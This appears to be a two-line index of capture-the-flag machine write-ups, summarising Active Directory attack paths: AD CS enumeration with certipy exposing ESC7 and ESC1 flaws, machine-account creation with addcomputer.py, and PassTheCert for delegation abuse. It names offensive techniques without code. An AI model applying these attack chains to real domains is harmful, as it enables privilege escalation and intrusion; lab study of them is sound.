  • Manager (Medium, AD/Windows) -- certipy AD CS enumeration reveals ESC7 vulnerability
  • Authority (Medium, AD/Windows) -- certipy finds ESC1 vulnerable CorpVPN template; addcomputer.py for machine account; PassTheCert for RBCD